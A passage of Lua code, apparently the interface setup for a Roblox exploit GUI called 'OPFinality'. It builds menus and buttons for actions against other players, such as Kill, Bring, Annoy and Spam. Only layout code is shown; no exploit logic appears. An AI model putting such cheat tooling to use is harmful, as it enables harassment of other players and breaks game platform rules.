CrouchAttack = Instance.new("TextButton") WalkThrough = Instance.new("TextButton") CreepyWatch = Instance.new("TextButton") SpinAttack = Instance.new("TextButton") ExtraBaseBackGround2Side_2 = Instance.new("Frame") TXTBOX_PlrNameEXTRA = Instance.new("TextBox") _18 = Instance.new("TextButton") SlamPropulsion = Instance.new("TextButton") Extra_backPAGE1 = Instance.new("TextButton") Character_toPAGE1_IMAGE_3 = Instance.new("ImageLabel") Others_3 = Instance.new("Frame") OthersTitle_3 = Instance.new("TextLabel") Other_Image3 = Instance.new("ImageLabel") OthersText_3 = Instance.new("TextLabel") TXTBOX_PlrNameOTHER3 = Instance.new("TextBox") othersBaseBackground3 = Instance.new("Frame") FreeFall = Instance.new("TextButton") Attach = Instance.new("TextButton") Bring = Instance.new("TextButton") SafeKill = Instance.new("TextButton") SuperSpin = Instance.new("TextButton") Kill = Instance.new("TextButton") Others_backPAGE2 = Instance.new("TextButton") Character_toPAGE1_IMAGE_4 = Instance.new("ImageLabel") Games = Instance.new("Frame") Games_IMAGE = Instance.new("ImageLabel") GamesText = Instance.new("TextLabel") Games_TITLE = Instance.new("TextLabel") Games_IMAGE2 = Instance.new("ImageLabel") SwordFightingTournament = Instance.new("TextButton") PlatesOfFateMayhem = Instance.new("TextButton") GamesText2 = Instance.new("TextLabel") Frappe = Instance.new("TextButton") Frappe_2 = Instance.new("TextButton") MenuFrame = Instance.new("Frame") Welcome = Instance.new("TextLabel") NameOfPlayer = Instance.new("TextLabel") T_Information = Instance.new("TextButton") T_InfoImage = Instance.new("ImageLabel") T_Character = Instance.new("TextButton") T_CharImage = Instance.new("ImageLabel") T_Games = Instance.new("TextButton") T_GameImage = Instance.new("ImageLabel") T_Others = Instance.new("TextButton") T_OtherImage = Instance.new("ImageLabel") T_Extra = Instance.new("TextButton") T_ExtraImage = Instance.new("ImageLabel") DeleteGUI = Instance.new("TextButton") DELETEIMAGE = Instance.new("ImageLabel") Darkness = Instance.new("TextButton") -- Properties OPFinality.Name = "OPFinality" OPFinality.Parent = game:GetService("CoreGui") MainFrame.Name = "MainFrame" MainFrame.Parent = OPFinality MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(1, 1, 1) MainFrame.BackgroundTransparency = 1 MainFrame.BorderSizePixel = 0 MainFrame.ClipsDescendants = true MainFrame.Draggable = true MainFrame.Position = UDim2.new(0, 402, 0, 162) MainFrame.Size = UDim2.new(0, 442, 0, 293) TopFrame.Name = "TopFrame" TopFrame.Parent = MainFrame TopFrame.BackgroundColor3 = Color3.new(0.752941, 0.223529, 0.168627) TopFrame.BorderColor3 = Color3.new(0.145098, 0.184314, 0.223529) TopFrame.BorderSizePixel = 0 TopFrame.Size = UDim2.new(1, 0, 0.0741975307, 0) TopFrame.ZIndex = 7 CloseGUI.Parent = TopFrame CloseGUI.BackgroundColor3 = Color3.new(1, 1, 1) CloseGUI.BackgroundTransparency = 1 CloseGUI.Position = UDim2.new(0.951219499, 0, 0, 0) CloseGUI.Size = UDim2.new(0.048780486, 0, 1.00166667, 0) CloseGUI.Font = Enum.Font.Cartoon CloseGUI.FontSize = Enum.FontSize.Size28 CloseGUI.Text = "X" CloseGUI.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) CloseGUI.TextSize = 25 CloseGUI.ZIndex = 8 MenuEnterFrame.Name = "MenuEnterFrame" MenuEnterFrame.Parent = MainFrame MenuEnterFrame.BackgroundColor3 = Color3.new(0.905882, 0.298039, 0.235294) MenuEnterFrame.BorderColor3 = Color3.new(0.145098, 0.184314, 0.223529) MenuEnterFrame.BorderSizePixel = 0 MenuEnterFrame.Position = UDim2.new(0, 0, 0.0741975307, 0) MenuEnterFrame.Size = UDim2.new(1, 0, 0.148395061, 0) MenuEnterFrame.ZIndex = 5 Title.Name = "Title" Title.Parent = MenuEnterFrame Title.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Title.BackgroundTransparency = 1 Title.Position = UDim2.new(0.341463417, 0, 0, 0) Title.Size = UDim2.new(0.292682916, 0, 1.00166667, 0) Title.Font = Enum.Font.SourceSansLight Title.FontSize = Enum.FontSize.Size32 Title.Text = "OPFinality" Title.TextColor3 = Color3.new(0.933333, 0.933333, 0.933333) Title.TextSize = 30 Title.ZIndex = 6 OpenMenu.Name = "OpenMenu" OpenMenu.Parent = MenuEnterFrame OpenMenu.BackgroundColor3 = Color3.new(1, 1, 1) OpenMenu.BackgroundTransparency = 1 OpenMenu.Size = UDim2.new(0.0909999982, 0, 1.01999998, 0) OpenMenu.Image = "http://www.roblox.com/asset/?id=1280184088" OpenMenu.ZIndex = 6 Pages.Name = "Pages" Pages.Parent = MainFrame Pages.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Pages.BorderSizePixel = 0 Pages.Position = UDim2.new(0, 0, 0.222592592, 0) Pages.Size = UDim2.new(1, 0, 0.779074073, 0) Information.Name = "Information" Information.Parent = Pages Information.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Information.BorderSizePixel = 0 Information.Size = UDim2.new(1, 0, 1, 0) Image_FE_ENABLED.Name = "Image_FE_ENABLED" Image_FE_ENABLED.Parent = Information Image_FE_ENABLED.BackgroundColor3 = Color3.new(1, 1, 1) Image_FE_ENABLED.BackgroundTransparency = 1 Image_FE_ENABLED.Position = UDim2.new(0.0227242485, 0, 0.0454809628, 0) Image_FE_ENABLED.Size = UDim2.new(0.136345491, 0, 0.263394117, 0) Image_FE_ENABLED.Visible = false Image_FE_ENABLED.Image = "http://www.roblox.com/asset/?id=1281289312" Text_FE_ENABLED.Name = "Text_FE_ENABLED" Text_FE_ENABLED.Parent = Information Text_FE_ENABLED.BackgroundColor3 = Color3.new(1, 1, 1) Text_FE_ENABLED.BackgroundTransparency = 1 Text_FE_ENABLED.Position = UDim2.new(0.158999994, 0, 0.0670000017, 0) Text_FE_ENABLED.Size = UDim2.new(0.795348704, 0, 0.227404833, 0) Text_FE_ENABLED.Visible = false Text_FE_ENABLED.Font = Enum.Font.SourceSansItalic Text_FE_ENABLED.FontSize = Enum.FontSize.Size24 Text_FE_ENABLED.Text = "This game is Filtering Enabled! Enjoy using OPFinality." Text_FE_ENABLED.TextSize = 19 WhatIsOPFinality.Name = "WhatIsOPFinality" WhatIsOPFinality.Parent = Information WhatIsOPFinality.BackgroundColor3 = Color3.new(1, 1, 1) WhatIsOPFinality.BackgroundTransparency = 1 WhatIsOPFinality.Position = UDim2.new(0.249966726, 0, 0.227404833, 0) WhatIsOPFinality.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) WhatIsOPFinality.Font = Enum.Font.SourceSansBold WhatIsOPFinality.FontSize = Enum.FontSize.Size28 WhatIsOPFinality.Text = "What is OPFinality?" WhatIsOPFinality.TextSize = 25 Text_FE_DISABLED.Name = "Text_FE_DISABLED" Text_FE_DISABLED.Parent = Information Text_FE_DISABLED.BackgroundColor3 = Color3.new(1, 1, 1) Text_FE_DISABLED.BackgroundTransparency = 1 Text_FE_DISABLED.Position = UDim2.new(0.158999994, 0, 0.0670000017, 0) Text_FE_DISABLED.Size = UDim2.new(0.545381963, 0, 0.227404833, 0) Text_FE_DISABLED.Font = Enum.Font.SourceSansItalic Text_FE_DISABLED.FontSize = Enum.FontSize.Size24 Text_FE_DISABLED.Text = "Oh! This game is Filtering Disabled..." Text_FE_DISABLED.TextSize = 19 OPFin_Description.Name = "OPFin_Description" OPFin_Description.Parent = Information OPFin_Description.BackgroundColor3 = Color3.new(1, 1, 1) OPFin_Description.BackgroundTransparency = 1 OPFin_Description.Position = UDim2.new(0.204999998, 0, 0.388000011, 0) OPFin_Description.Size = UDim2.new(0.772624433, 0, 0.181923851, 0) OPFin_Description.ZIndex = 3 OPFin_Description.Font = Enum.Font.SourceSans OPFin_Description.FontSize = Enum.FontSize.Size18 OPFin_Description.Text = "OPFinality is an FE GUI developed by illremember made for giving you power in Filtering Enabled games." OPFin_Description.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) OPFin_Description.TextSize = 18 OPFin_Description.TextWrapped = true OPFin_Warning.Name = "OPFin_Warning" OPFin_Warning.Parent = Information OPFin_Warning.BackgroundColor3 = Color3.new(1, 1, 1) OPFin_Warning.BackgroundTransparency = 1 OPFin_Warning.Position = UDim2.new(0.0227242485, 0, 0.636733532, 0) OPFin_Warning.Size = UDim2.new(0.659003198, 0, 0.272885799, 0) OPFin_Warning.ZIndex = 2 OPFin_Warning.Font = Enum.Font.SourceSans OPFin_Warning.FontSize = Enum.FontSize.Size18 OPFin_Warning.Text = "If this game is detected as Filtering Disabled, this GUI wont work as well as other scripts would. Consider using a different script." OPFin_Warning.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) OPFin_Warning.TextSize = 18 OPFin_Warning.TextWrapped = true Info_Bar.Name = "Info_Bar" Info_Bar.Parent = Information Info_Bar.BackgroundColor3 = Color3.new(0.160784, 0.501961, 0.72549) Info_Bar.BorderSizePixel = 0 Info_Bar.Position = UDim2.new(0.159069732, 0, 0.363847703, 0) Info_Bar.Size = UDim2.new(0.0227242485, 0, 0.227404833, 0) Info_Background.Name = "Info_Background" Info_Background.Parent = Information Info_Background.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Info_Background.BorderSizePixel = 0 Info_Background.Position = UDim2.new(0.181793988, 0, 0.363847703, 0) Info_Background.Size = UDim2.new(0.819999993, 0, 0.226999998, 0) Info_Background.ZIndex = 2 Warning_Bar.Name = "Warning_Bar" Warning_Bar.Parent = Information Warning_Bar.BackgroundColor3 = Color3.new(0.952941, 0.611765, 0.0705882) Warning_Bar.BorderSizePixel = 0 Warning_Bar.Position = UDim2.new(0.70445168, 0, 0.636733532, 0) Warning_Bar.Size = UDim2.new(0.0227242485, 0, 0.272885799, 0) Warning_Background.Name = "Warning_Background" Warning_Background.Parent = Information Warning_Background.BackgroundColor3 = Color3.new(0.945098, 0.768628, 0.0588235) Warning_Background.BorderSizePixel = 0 Warning_Background.Position = UDim2.new(0, 0, 0.636733532, 0) Warning_Background.Size = UDim2.new(0.70445168, 0, 0.272885799, 0) Info_Image.Name = "Info_Image" Info_Image.Parent = Information Info_Image.BackgroundColor3 = Color3.new(1, 1, 1) Info_Image.BackgroundTransparency = 1 Info_Image.Position = UDim2.new(0.0454484969, 0, 0.395091146, 0) Info_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Info_Image.Image = "http://www.roblox.com/asset/?id=1281284684" Image_FE_DISABLED.Name = "Image_FE_DISABLED" Image_FE_DISABLED.Parent = Information Image_FE_DISABLED.BackgroundColor3 = Color3.new(1, 1, 1) Image_FE_DISABLED.BackgroundTransparency = 1 Image_FE_DISABLED.Position = UDim2.new(0.0227242485, 0, 0.0454809628, 0) Image_FE_DISABLED.Size = UDim2.new(0.136345491, 0, 0.263394117, 0) Image_FE_DISABLED.Image = "http://www.roblox.com/asset/?id=1281290326" Warn_Image.Name = "Warn_Image" Warn_Image.Parent = Information Warn_Image.BackgroundColor3 = Color3.new(1, 1, 1) Warn_Image.BackgroundTransparency = 1 Warn_Image.Position = UDim2.new(0.763000011, 0, 0.677999973, 0) Warn_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Warn_Image.Image = "http://www.roblox.com/asset/?id=1281286925" Others_1.Name = "Others_1" Others_1.Parent = Pages Others_1.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_1.BorderSizePixel = 0 Others_1.Position = UDim2.new(1.00752497, 0, 0, 0) Others_1.Size = UDim2.new(1, 0, 1, 0) OthersTitle.Name = "OthersTitle" OthersTitle.Parent = Others_1 OthersTitle.BackgroundColor3 = Color3.new(1, 1, 1) OthersTitle.BackgroundTransparency = 1 OthersTitle.Position = UDim2.new(0.226410091, 0, 0.0439298227, 0) OthersTitle.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) OthersTitle.Font = Enum.Font.SourceSansBold OthersTitle.FontSize = Enum.FontSize.Size28 OthersTitle.Text = "Others" OthersTitle.TextSize = 25 Char_Image.Name = "Char_Image" Char_Image.Parent = Others_1 Char_Image.BackgroundColor3 = Color3.new(1, 1, 1) Char_Image.BackgroundTransparency = 1 Char_Image.Position = UDim2.new(0.0113205044, 0, 0.153754383, 0) Char_Image.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Char_Image.Image = "http://www.roblox.com/asset/?id=1281476978" OthersText.Name = "OthersText" OthersText.Parent = Others_1 OthersText.BackgroundColor3 = Color3.new(1, 1, 1) OthersText.BackgroundTransparency = 1 OthersText.Position = UDim2.new(0.101884536, 0, 0.153754383, 0) OthersText.Size = UDim2.new(0.781114817, 0, 0.175719291, 0) OthersText.Font = Enum.Font.SourceSansItalic OthersText.FontSize = Enum.FontSize.Size24 OthersText.Text = "Use a set of basic commands on other players! Enter a name into the textbox, supports partial names." OthersText.TextSize = 19 OthersText.TextWrapped = true TXTBOX_PlrName.Name = "TXTBOX_PlrName" TXTBOX_PlrName.Parent = Others_1 TXTBOX_PlrName.BackgroundColor3 = Color3.new(0.956863, 0.968628, 0.972549) TXTBOX_PlrName.BorderColor3 = Color3.new(0.152941, 0.682353, 0.376471) TXTBOX_PlrName.BorderSizePixel = 0 TXTBOX_PlrName.Position = UDim2.new(0.249051109, 0, 0.395368397, 0) TXTBOX_PlrName.Size = UDim2.new(0.520743191, 0, 0.0878596455, 0) TXTBOX_PlrName.ZIndex = 2 TXTBOX_PlrName.Font = Enum.Font.SourceSans TXTBOX_PlrName.FontSize = Enum.FontSize.Size14 TXTBOX_PlrName.Text = "Player" TXTBOX_PlrName.TextScaled = true TXTBOX_PlrName.TextSize = 14 TXTBOX_PlrName.TextWrapped = true othersBaseBackground.Name = "othersBaseBackground" othersBaseBackground.Parent = Others_1 othersBaseBackground.BackgroundColor3 = Color3.new(0.160784, 0.501961, 0.72549) othersBaseBackground.BorderSizePixel = 0 othersBaseBackground.Position = UDim2.new(0.124525554, 0, 0.351438582, 0) othersBaseBackground.Size = UDim2.new(0.769999981, 0, 0.649999976, 0) TeleportTo.Name = "TeleportTo" TeleportTo.Parent = othersBaseBackground TeleportTo.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) TeleportTo.BorderSizePixel = 0 TeleportTo.Position = UDim2.new(0.0294333119, 0, 0.27070269, 0) TeleportTo.Size = UDim2.new(0, 92, 0, 25) TeleportTo.Font = Enum.Font.SourceSans TeleportTo.FontSize = Enum.FontSize.Size24 TeleportTo.Text = "Teleport To" TeleportTo.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) TeleportTo.TextSize = 22 Annoy.Name = "Annoy" Annoy.Parent = othersBaseBackground Annoy.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Annoy.BorderSizePixel = 0 Annoy.Position = UDim2.new(0.0294333119, 0, 0.507567585, 0) Annoy.Size = UDim2.new(0, 92, 0, 25) Annoy.Font = Enum.Font.SourceSans Annoy.FontSize = Enum.FontSize.Size24 Annoy.Text = "Annoy" Annoy.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Annoy.TextSize = 22 Follow.Name = "Follow" Follow.Parent = othersBaseBackground Follow.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Follow.BorderSizePixel = 0 Follow.Position = UDim2.new(0.0294333119, 0, 0.744432449, 0) Follow.Size = UDim2.new(0, 92, 0, 25) Follow.Font = Enum.Font.SourceSans Follow.FontSize = Enum.FontSize.Size24 Follow.Text = "Follow" Follow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Follow.TextSize = 22 View.Name = "View" View.Parent = othersBaseBackground View.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) View.BorderSizePixel = 0 View.Position = UDim2.new(0.367916405, 0, 0.27070269, 0) View.Size = UDim2.new(0, 92, 0, 25) View.Font = Enum.Font.SourceSans View.FontSize = Enum.FontSize.Size24 View.Text = "View" View.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) View.TextSize = 22 Orbit.Name = "Orbit" Orbit.Parent = othersBaseBackground Orbit.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Orbit.BorderSizePixel = 0 Orbit.Position = UDim2.new(0.367916405, 0, 0.507567585, 0) Orbit.Size = UDim2.new(0, 92, 0, 25) Orbit.Font = Enum.Font.SourceSans Orbit.FontSize = Enum.FontSize.Size24 Orbit.Text = "Orbit" Orbit.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Orbit.TextSize = 22 HeadWalk.Name = "HeadWalk" HeadWalk.Parent = othersBaseBackground HeadWalk.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) HeadWalk.BorderSizePixel = 0 HeadWalk.Position = UDim2.new(0.367916405, 0, 0.744432449, 0) HeadWalk.Size = UDim2.new(0, 92, 0, 25) HeadWalk.Font = Enum.Font.SourceSans HeadWalk.FontSize = Enum.FontSize.Size24 HeadWalk.Text = "Head Walk" HeadWalk.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) HeadWalk.TextSize = 22 Stick.Name = "Stick" Stick.Parent = othersBaseBackground Stick.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Stick.BorderSizePixel = 0 Stick.Position = UDim2.new(0.7063995, 0, 0.27070269, 0) Stick.Size = UDim2.new(0, 92, 0, 25) Stick.Font = Enum.Font.SourceSans Stick.FontSize = Enum.FontSize.Size24 Stick.Text = "Stick" Stick.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Stick.TextSize = 22 Spam.Name = "Spam" Spam.Parent = othersBaseBackground Spam.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Spam.BorderSizePixel = 0 Spam.Position = UDim2.new(0.7063995, 0, 0.507567585, 0) Spam.Size = UDim2.new(0, 92, 0, 25) Spam.Font = Enum.Font.SourceSans Spam.FontSize = Enum.FontSize.Size24 Spam.Text = "Spam" Spam.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Spam.TextSize = 22 Carpet.Name = "Carpet" Carpet.Parent = othersBaseBackground Carpet.BackgroundColor3 = Color3.new(0.203922, 0.596078, 0.858824) Carpet.BorderSizePixel = 0 Carpet.Position = UDim2.new(0.7063995, 0, 0.744432449, 0) Carpet.Size = UDim2.new(0, 92, 0, 25) Carpet.Font = Enum.Font.SourceSans Carpet.FontSize = Enum.FontSize.Size24 Carpet.Text = "Carpet" Carpet.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Carpet.TextSize = 22 Others_toPAGE2.Name = "Others_toPAGE2" Others_toPAGE2.Parent = Others_1 Others_toPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_toPAGE2.BorderSizePixel = 0 Others_toPAGE2.Position = UDim2.new(0.819999993, 0, 0.0439999998, 0) Others_toPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_toPAGE2.Font = Enum.Font.SourceSansLight Others_toPAGE2.FontSize = Enum.FontSize.Size24 Others_toPAGE2.Text = "Next" Others_toPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_toPAGE2.TextSize = 22 Character_toPAGE2_IMAGE.Name = "Character_toPAGE2_IMAGE" Character_toPAGE2_IMAGE.Parent = Others_toPAGE2 Character_toPAGE2_IMAGE.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE2_IMAGE.BorderSizePixel = 0 Character_toPAGE2_IMAGE.Position = UDim2.new(0.900659323, 0, 0, 0) Character_toPAGE2_IMAGE.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE2_IMAGE.Image = "http://www.roblox.com/asset/?id=1282737326" Character_2.Name = "Character_2" Character_2.Parent = Pages Character_2.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_2.BorderSizePixel = 0 Character_2.Position = UDim2.new(1, 0, 0, 0) Character_2.Size = UDim2.new(1, 0, 1, 0) CharacterTitle.Name = "CharacterTitle" CharacterTitle.Parent = Character_2 CharacterTitle.BackgroundColor3 = Color3.new(1, 1, 1) CharacterTitle.BackgroundTransparency = 1 CharacterTitle.Position = UDim2.new(0.226410091, 0, 0, 0) CharacterTitle.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) CharacterTitle.Font = Enum.Font.SourceSansBold CharacterTitle.FontSize = Enum.FontSize.Size28 CharacterTitle.Text = "Character" CharacterTitle.TextSize = 25 CharacterText.Name = "CharacterText" CharacterText.Parent = Character_2 CharacterText.BackgroundColor3 = Color3.new(1, 1, 1) CharacterText.BackgroundTransparency = 1 CharacterText.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) CharacterText.Size = UDim2.new(0.679230273, 0, 0.0878596455, 0) CharacterText.Font = Enum.Font.SourceSansItalic CharacterText.FontSize = Enum.FontSize.Size24 CharacterText.Text = "Apply cool animations to your player!" CharacterText.TextSize = 19 CharacterText.TextWrapped = true Animations_SPOOKY.Name = "Animations_SPOOKY" Animations_SPOOKY.Parent = Character_2 Animations_SPOOKY.BackgroundColor3 = Color3.new(0.827451, 0.329412, 0) Animations_SPOOKY.BorderSizePixel = 0 Animations_SPOOKY.Position = UDim2.new(0.101884536, 0, 0.263578951, 0) Animations_SPOOKY.Size = UDim2.new(0.200000003, 0, 0.735000014, 0) spookytitle.Name = "spookytitle" spookytitle.Parent = Animations_SPOOKY spookytitle.BackgroundColor3 = Color3.new(1, 1, 1) spookytitle.BackgroundTransparency = 1 spookytitle.Position = UDim2.new(0, 0, 0.0298095234, 0) spookytitle.Size = UDim2.new(0.96661669, 0, 0.149047628, 0) spookytitle.Font = Enum.Font.SourceSansLight spookytitle.FontSize = Enum.FontSize.Size28 spookytitle.Text = "Spooky" spookytitle.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) spookytitle.TextSize = 25 headthrow.Name = "headthrow" headthrow.Parent = Animations_SPOOKY headthrow.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) headthrow.BorderSizePixel = 0 headthrow.Position = UDim2.new(0, 0, 0.238476187, 0) headthrow.Size = UDim2.new(1, 0, 0.119000003, 0) headthrow.Font = Enum.Font.SourceSans headthrow.FontSize = Enum.FontSize.Size14 headthrow.Text = "Head Throw" headthrow.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) headthrow.TextScaled = true headthrow.TextSize = 14 headthrow.TextWrapped = true armsoff.Name = "armsoff" armsoff.Parent = Animations_SPOOKY armsoff.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) armsoff.BorderSizePixel = 0 armsoff.Position = UDim2.new(0, 0, 0.3875238, 0) armsoff.Size = UDim2.new(1, 0, 0.119000003, 0) armsoff.Font = Enum.Font.SourceSans armsoff.FontSize = Enum.FontSize.Size14 armsoff.Text = "Arms Off" armsoff.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) armsoff.TextScaled = true armsoff.TextSize = 14 armsoff.TextWrapped = true loophead.Name = "loophead" loophead.Parent = Animations_SPOOKY loophead.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) loophead.BorderSizePixel = 0 loophead.Position = UDim2.new(0, 0, 0.536571383, 0) loophead.Size = UDim2.new(1, 0, 0.119000003, 0) loophead.Font = Enum.Font.SourceSans loophead.FontSize = Enum.FontSize.Size14 loophead.Text = "Loop Head" loophead.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) loophead.TextScaled = true loophead.TextSize = 14 loophead.TextWrapped = true levitate.Name = "levitate" levitate.Parent = Animations_SPOOKY levitate.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) levitate.BorderSizePixel = 0 levitate.Position = UDim2.new(0, 0, 0.685619056, 0) levitate.Size = UDim2.new(1, 0, 0.119000003, 0) levitate.Font = Enum.Font.SourceSans levitate.FontSize = Enum.FontSize.Size14 levitate.Text = "Levitate" levitate.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) levitate.TextScaled = true levitate.TextSize = 14 levitate.TextWrapped = true headfloat.Name = "headfloat" headfloat.Parent = Animations_SPOOKY headfloat.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) headfloat.BorderSizePixel = 0 headfloat.Position = UDim2.new(0, 0, 0.834666669, 0) headfloat.Size = UDim2.new(1, 0, 0.119000003, 0) headfloat.Font = Enum.Font.SourceSans headfloat.FontSize = Enum.FontSize.Size14 headfloat.Text = "Head Float" headfloat.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) headfloat.TextScaled = true headfloat.TextSize = 14 headfloat.TextWrapped = true Character_backPAGE1.Name = "Character_backPAGE1" Character_backPAGE1.Parent = Character_2 Character_backPAGE1.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_backPAGE1.BorderSizePixel = 0 Character_backPAGE1.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Character_backPAGE1.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Character_backPAGE1.Font = Enum.Font.SourceSansLight Character_backPAGE1.FontSize = Enum.FontSize.Size24 Character_backPAGE1.Text = "Prev" Character_backPAGE1.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Character_backPAGE1.TextSize = 22 Character_toPAGE1_IMAGE.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE.Parent = Character_backPAGE1 Character_toPAGE1_IMAGE.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE.BorderSizePixel = 0 Character_toPAGE1_IMAGE.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE.Image = "http://www.roblox.com/asset/?id=1282894968" Animations_DANCE.Name = "Animations_DANCE" Animations_DANCE.Parent = Character_2 Animations_DANCE.BackgroundColor3 = Color3.new(0.827451, 0.329412, 0) Animations_DANCE.BorderSizePixel = 0 Animations_DANCE.Position = UDim2.new(0.407538146, 0, 0.263578951, 0) Animations_DANCE.Size = UDim2.new(0.200000003, 0, 0.735000014, 0) dancetitle.Name = "dancetitle" dancetitle.Parent = Animations_DANCE dancetitle.BackgroundColor3 = Color3.new(1, 1, 1) dancetitle.BackgroundTransparency = 1 dancetitle.Position = UDim2.new(0, 0, 0.0298095234, 0) dancetitle.Size = UDim2.new(0.96661669, 0, 0.149047628, 0) dancetitle.Font = Enum.Font.SourceSansLight dancetitle.FontSize = Enum.FontSize.Size28 dancetitle.Text = "Dance" dancetitle.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) dancetitle.TextSize = 25 normal.Name = "normal" normal.Parent = Animations_DANCE normal.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) normal.BorderSizePixel = 0 normal.Position = UDim2.new(0, 0, 0.238476187, 0) normal.Size = UDim2.new(1, 0, 0.119000003, 0) normal.Font = Enum.Font.SourceSans normal.FontSize = Enum.FontSize.Size14 normal.Text = "Normal" normal.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) normal.TextScaled = true normal.TextSize = 14 normal.TextWrapped = true movingdance.Name = "movingdance" movingdance.Parent = Animations_DANCE movingdance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) movingdance.BorderSizePixel = 0 movingdance.Position = UDim2.new(0, 0, 0.3875238, 0) movingdance.Size = UDim2.new(1, 0, 0.119000003, 0) movingdance.Font = Enum.Font.SourceSans movingdance.FontSize = Enum.FontSize.Size14 movingdance.Text = "Moving Dance" movingdance.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) movingdance.TextScaled = true movingdance.TextSize = 14 movingdance.TextWrapped = true insane.Name = "insane" insane.Parent = Animations_DANCE insane.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) insane.BorderSizePixel = 0 insane.Position = UDim2.new(0, 0, 0.834666669, 0) insane.Size = UDim2.new(1, 0, 0.119000003, 0) insane.Font = Enum.Font.SourceSans insane.FontSize = Enum.FontSize.Size14 insane.Text = "Insane" insane.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) insane.TextScaled = true insane.TextSize = 14 insane.TextWrapped = true happy.Name = "happy" happy.Parent = Animations_DANCE happy.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) happy.BorderSizePixel = 0 happy.Position = UDim2.new(0, 0, 0.536571383, 0) happy.Size = UDim2.new(1, 0, 0.119000003, 0) happy.Font = Enum.Font.SourceSans happy.FontSize = Enum.FontSize.Size14 happy.Text = "Happy" happy.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) happy.TextScaled = true happy.TextSize = 14 happy.TextWrapped = true spindance.Name = "spindance" spindance.Parent = Animations_DANCE spindance.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) spindance.BorderSizePixel = 0 spindance.Position = UDim2.new(0, 0, 0.685619056, 0) spindance.Size = UDim2.new(1, 0, 0.119000003, 0) spindance.Font = Enum.Font.SourceSans spindance.FontSize = Enum.FontSize.Size14 spindance.Text = "Spin Dance" spindance.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) spindance.TextScaled = true spindance.TextSize = 14 spindance.TextWrapped = true Animations_HEROIC.Name = "Animations_HEROIC" Animations_HEROIC.Parent = Character_2 Animations_HEROIC.BackgroundColor3 = Color3.new(0.827451, 0.329412, 0) Animations_HEROIC.BorderSizePixel = 0 Animations_HEROIC.Position = UDim2.new(0.713191807, 0, 0.263578951, 0) Animations_HEROIC.Size = UDim2.new(0.200000003, 0, 0.735000014, 0) heroictitle.Name = "heroictitle" heroictitle.Parent = Animations_HEROIC heroictitle.BackgroundColor3 = Color3.new(1, 1, 1) heroictitle.BackgroundTransparency = 1 heroictitle.Position = UDim2.new(0, 0, 0.0298095234, 0) heroictitle.Size = UDim2.new(0.96661669, 0, 0.149047628, 0) heroictitle.Font = Enum.Font.SourceSansLight heroictitle.FontSize = 